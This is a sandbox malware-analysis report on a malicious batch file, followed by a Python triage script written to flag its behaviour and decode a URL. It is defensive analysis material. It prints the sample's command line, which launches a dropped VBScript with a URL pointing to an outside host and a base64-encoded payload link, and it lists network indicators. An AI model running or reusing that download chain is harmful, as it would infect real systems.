File name: Be-kOPmZrE4b1hZ72_cA.cmd
Full analysis: https://app.any.run/tasks/b97027c6-34c4-4da7-9e21-b6ffd70c451e
Verdict: Malicious activity
Analysis date: June 19, 2019, 16:52:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5: 34059A0DCD7FF5F42DB49435BF4210C1
SHA1: 7002F75EF2DE1E1D8267E41B60CC4170EDA1ED59
SHA256: 86E1BFAE16AA445206240C9C501369846D43B978D120C60E0CCE755C98FDD2A4
SSDEEP: 48:/G7dI5RtNyyRO+8+wwn08QNn3eO5Mz8n5iq85katzg/g5yZ9z4+XvBwDU94xDhr:55RXz5dg73Yz0F/g5+wqu1r
ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Runs PING.EXE for delay simulation: cmd.exe (PID: 2000)
    • Changes settings of System certificates: wscript.exe (PID: 2508)
  • SUSPICIOUS
    • Executes scripts: cmd.exe (PID: 2000)
    • Creates files in the program directory: cmd.exe (PID: 2000)
    • Creates files in the user directory: wscript.exe (PID: 2508)
    • Adds / modifies Windows certificates: wscript.exe (PID: 2508)
  • INFO
    No info indicators.
No Malware configuration.
Total processes: 35
Monitored processes: 3
Malicious processes: 2
Suspicious processes: 0

Behavior graph

start → cmd.exe (no specs) → ping.exe (no specs)
                           → wscript.exe

Process information

PID: 2000
CMD: cmd /c ""C:\Users\admin\AppData\Local\Temp\Be-kOPmZrE4b1hZ72_cA.cmd" "
Path: C:\Windows\system32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1344
CMD: ping 127.0.0.1 -n 1
Path: C:\Windows\system32\PING.EXE
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Ping Command
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2508
CMD: wscript //Nologo "C:\ProgramData\.VVVVVjt\admin.vbs" AS111 https://pt-br.ooguy.com/appkcmd/aHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2NvbnNvbGVjbG91ZC9mb2xkZXItamgvc2diZ2Q2a3kzOS5ibXAmbm8tcG93ZXI=
Path: C:\Windows\system32\wscript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Version: 5.8.7600.16385
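The chain in the table is the whole story the report tells: cmd.exe drops admin.vbs into a dot-prefixed directory under C:\ProgramData, pauses with a loopback ping, and hands wscript.exe a URL whose last path segment is base64. The added Python below (written for this page, not ANY.RUN code and not the sample's own logic) replays that triage offline: it flags the two behaviours the report tags, pulls the URL off the wscript command line and decodes the base64 path segment. The process records are transcribed from the table above; the detection rules and their wording are the editor's own. The decoded value is only what the argument encodes: the report records a single TLS connection to pt-br.ooguy.com and no HTTP requests, so nothing on this page shows whether that embedded URL is ever fetched or what it returns.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Process records transcribed from the "Process information" table of the report.
# Constructed offline copy for this example; not pulled from the ANY.RUN API.
PROCESSES = [
    {"pid": 2000, "image": r"C:\Windows\system32\cmd.exe", "parent": "explorer.exe",
     "cmd": r'cmd /c ""C:\Users\admin\AppData\Local\Temp\Be-kOPmZrE4b1hZ72_cA.cmd" "'},
    {"pid": 1344, "image": r"C:\Windows\system32\PING.EXE", "parent": "cmd.exe",
     "cmd": "ping 127.0.0.1 -n 1"},
    {"pid": 2508, "image": r"C:\Windows\system32\wscript.exe", "parent": "cmd.exe",
     "cmd": r'wscript //Nologo "C:\ProgramData\.VVVVVjt\admin.vbs" AS111 '
            "https://pt-br.ooguy.com/appkcmd/"
            "aHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2NvbnNvbGVjbG91ZC9mb2xkZXItamgvc2diZ2Q2a3kzOS5ibXAmbm8tcG93ZXI="},
]

# A path segment is treated as a base64 candidate only if it is long enough to be
# more than a short token ("AS111", "appkcmd" are skipped) and uses the standard alphabet.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
URL_RE = re.compile(r"https?://\S+")
PROGRAMDATA_DOTDIR_RE = re.compile(r"C:\\ProgramData\\\.", re.IGNORECASE)


def decode_b64_text(seg):
    """Return seg decoded as printable ASCII if it is well-formed base64, otherwise None."""
    if not B64_RE.match(seg):
        return None
    try:
        text = base64.b64decode(seg, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_url_segments(url):
    """Base64-decode every path segment of url that looks like base64.

    Returns a list of (segment, decoded_text) pairs, in path order.
    """
    found = []
    for seg in urlsplit(url).path.split("/"):
        decoded = decode_b64_text(seg)
        if decoded is not None:
            found.append((seg, decoded))
    return found


def triage(processes):
    """Apply the editor's own rules to the process list.

    Rules (hypothetical wording, modelled on the report's indicator names):
      - ping.exe aimed at 127.0.0.1 with -n: the classic batch-file sleep.
      - wscript/cscript running a script from a dot-prefixed C:\\ProgramData directory.
      - wscript/cscript given a URL on its command line; the URL is kept as an IOC
        and any base64 path segment is decoded.
    """
    findings, urls, decoded = [], [], []
    for p in processes:
        cmd = p["cmd"]
        name = p["image"].rsplit("\\", 1)[-1].lower()
        if name == "ping.exe" and "127.0.0.1" in cmd.split() and "-n" in cmd.split():
            findings.append((p["pid"], "ping to 127.0.0.1 used as a delay"))
        if name in ("wscript.exe", "cscript.exe"):
            if PROGRAMDATA_DOTDIR_RE.search(cmd):
                findings.append((p["pid"], "script host running a script from a dot-prefixed ProgramData directory"))
            for url in URL_RE.findall(cmd):
                findings.append((p["pid"], "script host given a URL argument"))
                urls.append((p["pid"], url))
                for _seg, text in decode_url_segments(url):
                    decoded.append((p["pid"], text))
    return {"findings": findings, "urls": urls, "decoded": decoded}


if __name__ == "__main__":
    result = triage(PROCESSES)
    for pid, msg in result["findings"]:
        print(f"PID {pid}: {msg}")
    for pid, url in result["urls"]:
        print(f"PID {pid}: URL argument {url}")
    for pid, text in result["decoded"]:
        print(f"PID {pid}: base64 path segment decodes to {text}")
```

The loopback-ping rule fires on `-n` with any count; a single echo request is a sub-second pause, so on its own it is a weak signal and is only worth the "malicious" weight the report gives it when it sits between a dropped script and a script-host launch as it does here. The base64 check deliberately requires the `validate=True` strict alphabet and a printable result, so an opaque token that happens to decode to binary does not get reported as a URL.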
Total events: 100
Read events: 63
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 0
Suspicious files: 0
Text files: 24
Unknown types: 0

Dropped files

PID: 2000
Process: cmd.exe
Filename: C:\ProgramData\.VVVVVjt\admin.vbs
Type: text
MD5: AAFB3FEF09724D896CEAA2D1E4554294
SHA256: B098BA4F64DF89592C6EE7B9C2FC86A6099EEB784D519A2CCF9DC1A93CF51869
HTTP(S) requests: 0
TCP/UDP connections: 1
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests

Connections

PID: 2508
Process: wscript.exe
IP: 54.207.55.139:443
Domain: pt-br.ooguy.com
ASN: Amazon.com, Inc.
CN: BR
Reputation: unknown

DNS requests

pt-br.ooguy.com → 54.207.55.139 (reputation: unknown)
edzz.la → 18.215.105.2 (reputation: unknown)

Threats

No threats detected
No debug info